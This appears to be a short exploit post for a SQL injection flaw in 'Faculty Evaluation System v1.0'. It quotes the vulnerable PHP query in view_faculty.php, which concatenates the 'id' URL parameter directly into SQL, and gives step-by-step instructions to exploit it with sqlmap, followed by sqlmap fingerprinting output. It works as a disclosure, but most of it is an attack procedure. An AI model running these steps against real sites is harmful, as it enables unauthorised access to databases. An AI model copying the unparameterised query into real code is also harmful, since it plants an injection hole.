Application
- Faculty Evaluation System v1.0
Information
- Input not validated
- No input filtering
- SQL inject flaw
Exploit
File: view_faculty.php
Line #4
// Add "id" parameter after "view_faculty" parameter then add equals "id" with integer
[...]
$qry = $conn->query("SELECT *,concat(firstname,' ',lastname) as name FROM faculty_list where id = ".$_GET['id'])->fetch_array();
[...]
Steps to Exploit:
1. Login to application
2. Browse to following URI "http://host/eval/index.php?page=view_faculty&id=1"
3. Copy request to intercept proxy to file
4. Exploit using SQLMap
sqlmap -r test.txt --threads 1 --dbms=mysql --fingerprint
[...]
[INFO] testing MySQL
[INFO] confirming MySQL
[INFO] the back-end DBMS is MySQL
[INFO] actively fingerprinting MySQL
[INFO] executing MySQL comment injection fingerprint
back-end DBMS: active fingerprint: MySQL >= 5.7
comment injection fingerprint: MySQL 5.6.49
fork fingerprint: MariaDB
[...]
No comments:
Post a Comment